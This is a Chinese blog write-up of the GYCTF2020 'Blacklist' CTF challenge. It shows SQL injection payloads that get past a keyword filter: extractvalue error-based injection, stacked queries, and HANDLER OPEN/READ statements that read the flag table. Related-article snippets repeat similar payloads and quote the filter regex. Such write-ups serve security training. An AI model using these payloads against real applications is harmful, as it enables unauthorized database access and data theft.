[GYCTF2020]Blacklist(报错注入+堆叠注入+HANDLER ... OPEN语句)

最新推荐文章于 2024-02-05 15:01:15 发布
最新推荐文章于 2024-02-05 15:01:15 发布
阅读量263 收藏
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44110537/article/details/108858217
版权

输入select发现被过滤了.
在这里插入图片描述
这里直接告诉我们哪些关键词被过滤了.
发现;没被过滤,同时虽然update被过滤了,但是仍然可以用extractvalue报错注入得到数据库的名字.
1’ and extractvalue(1,concat(’~’,database()))#
得到:
在这里插入图片描述
得到数据库名后就可以show tables了.
1’;use supersqli;show tables;#
在这里插入图片描述
得到表名之后.
使用HANDLER … OPEN语句
1’;
handler FlagHere open;
handler FlagHere read first;
handler flaghere close;

得到flag
在这里插入图片描述

前方是否可导?
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MAC常见五国报错代码表以及解决方案.
04-13
MAC常见五国报错代码表以及解决方案 MAC操作系统中,五国报错代码表是常见的错误解决方案之一。本文将对MAC系统版本10.8-10.12中常见的五国报错代码进行汇总和解释,并提供相应的解决方案。 一、 BootThink 错误 ...
Nvidia418+CUDA10.0+CUDNN7.6.2+Tensoflow1.13.1.docx
10-01
5. 禁止第三方驱动:编辑 `/etc/modprobe.d/blacklist.conf` 文件,添加 `blacklist nouveau` 和 `options nouveau modeset=0` 6. 更新内核:`sudo update-initramfs -u` 7. 重启:`reboot` 8. 检查第三方驱动是否被...
[GYCTF2020]Blacklist
weixin_52268949的博客
01-26 2350
[GYCTF2020]Blacklist(堆叠注入) 补充知识点 desc查看表结构的详细信息 desc table_name; PS:此处desc是describe的缩写,用法: desc 表名/查询语句 desc降序排列数据 select ename,sal from emp order by sal desc; 手动指定按照薪水由大到小排序(降序关键字desc) select ename,sal from emp order by sal asc; 手动指定按照薪水由小到大排序(升序关键字asc) P
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 642
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
[GYCTF2020]Blacklist1-BUUCTF-详解
最新发布
chinese_cabbage0的博客
02-05 1712
主要是buuctf的整个题目的解题过程,比较好理解,也比较全面,大家可以参考一下
liunx和DELLMD3200+多路径配置[收集].pdf
10-11
在这个例子中,我们关注的是`blacklist`配置,它用于排除不需要显示的设备,如20M的access LUN。将WWID(World Wide Identifier)添加到黑名单中,可以避免它们在`multipath -ll`输出中出现。 3. **查看和管理LUN**...
DISCORD.JS-BlackList-UnBlackList:卸载清单DISCORD.JS BlackListUnBlackLis命令
02-18
:information: DISCORD.JS-BlackList-UnBlackLis 将清单中的内容输入到BlackList / UnBlackList命令中。 默西·德·莱塞尔 :star: (STAR)Si Vous L'avezutilisépour votre bot。 :laptop: 代码Voici评论进口商...
Blacklist.gov.az Blocker-crx插件
04-04
Blacklist.gov.az Blocker-crx插件是一款专为谷歌Chrome浏览器设计的安全工具,其主要功能是帮助用户防止访问被Blacklist.gov.az Feed Center识别为可疑或恶意的网站。这款扩展程序通过集成Blacklist.gov.az的数据源...
ROSE笔记-[GYCTF2020]Blacklist 1-WP
居上
11-13 338
[GYCTF2020]Blacklist 1 输入单引号,报错,sql注入. 1' or 1=1 order by 2#没有报错 1' or 1=1 order by 3#报错 先尝试联合查询 1' or 1=1 union select 1,2 发现过滤了大部分关键字 1' or 1=1;show databases;#查库 1' or 1=1;show tables;#查表 1' or 1=1;desc FlagHere;#查字段 HANDLEROPEN语句打开一个表,使其可以使用后
mysql查询语句-handler
qq_44927883的博客
12-02 447
1 简介 mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。 HANDLER语句提供通往表的直接通道的存储引擎接口,可以用于MyISAM和InnoDB表。 2 基本语法 handler语句的语法如下: HANDLER tbl_name OPEN [ [AS] alias] HANDLER tbl_name READ inde
Handler消息派发
zzf8845的专栏
03-11 250
1.消息处理遵循 生产者消费者模式Handler既是生成者,又是消费者Message是产品MessageQueue充当阻塞队列,内部使用Link来实现,用msg.when来实现队列内msg的排序Looper 使用MsgQueueMsg what,args,data代表msg可以携带变量flags用来标识是否在使用(FLAG_IN_USE),如果在使用,将不会放入Queue中是否是同步(FLAG_A...
GYCTF2020]Blacklist----总结下sql注入的骚姿势
cainiao17441898的博客
05-19 168
解题: 前面怎么到这步的不做赘述(堆叠注入)。这步的命令:1’;show columns from FlagHERE#; 那么要怎么打开这个表呢? 有几个解法: 解法一:使用handler openhandler close,handler read first。 HANDLEROPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭。 方法2: ALTER TABLE 语句用于在已有的
SQL注入堆叠注入/预处理/handler-[强网杯 2019]随便注 1
小龙在线
09-15 1784
介绍 所谓堆叠注入,就是把多条完整的SQL语句用分号;分隔开,而不是用union或union all连接起来。 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用
handler mysql_浅谈MysQL中HANDLER语法介绍及使用
weixin_36429611的博客
03-04 603
今天小编要和大家说的是handler的用法,希望对大家有所帮助。HANDLER tbl_name OPEN [ AS alias ]HANDLER tbl_name READ index_name { = | >= | <= | < } (value1,value2,...)[ WHERE where_condition ] [LIMIT ... ]HANDLER tbl_nam...
GYCTF2020_Writeup
Lethe's Blog
03-15 2545
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
blacklist.conf
09-06
blacklist.conf是一个配置文件,用于在Nginx服务器中设置黑名单。可以通过在nginx.conf文件中添加`include /usr/local/nginx/conf/blacklist.conf;`来引入blacklist.conf文件。 在blacklist.conf文件的最后部分,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值